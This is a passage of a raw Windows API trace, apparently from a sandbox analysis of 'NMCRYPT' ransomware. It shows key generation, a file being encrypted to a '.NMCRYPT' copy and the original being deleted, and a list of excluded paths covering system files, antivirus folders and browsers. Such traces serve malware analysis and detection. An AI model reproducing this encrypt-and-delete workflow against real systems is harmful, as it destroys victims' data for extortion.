dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.783] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.784] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.785] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.785] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0165.785] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.785] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad378) returned 1 [0165.785] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.785] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.785] wcslen (_String="\\\\?\\") returned 0x4 [0165.785] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0165.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.788] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=232) returned 1 [0165.789] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xe8, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0165.789] GetLastError () returned 0x0 [0165.789] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0165.790] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.790] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.791] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 1 [0165.791] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm")) returned 0 [0165.791] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" [0165.791] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.791] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFB22.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfb22.tmp")) returned 0xfb22 [0165.792] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFB22.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfb22.tmp"), dwFlags=0x1) returned 0 [0165.792] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFB22.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfb22.tmp")) returned 1 [0165.792] CryptDestroyKey (hKey=0x9ad138) returned 1 [0165.792] wcslen (_String="OK") returned 0x2 [0165.793] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.793] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.793] CryptDestroyKey (hKey=0x9ad378) returned 1 [0165.793] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0165.793] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*NMCRYPT") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*Recovers your files.html") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.exe") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.dll") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.lnk") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.bat") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.ini") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.msi") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*.scf") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*pagefile.sys*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*AppData*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\winrar\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\java\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\windows\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\ESET\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\AVG\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*Atheros*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*Realtek*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*bootmgr*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*boot*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*boot*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*IO.SYS*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*ntldr*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*chrome*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*opera*") returned 0 [0165.793] PathMatchSpecW (pszFile="SoftBlue.jpg", pszSpec="*firefox*") returned 0 [0165.793] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg", pszSpec="*") returned 1 [0165.793] strlen (_Str="NMoreira") returned 0x8 [0165.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 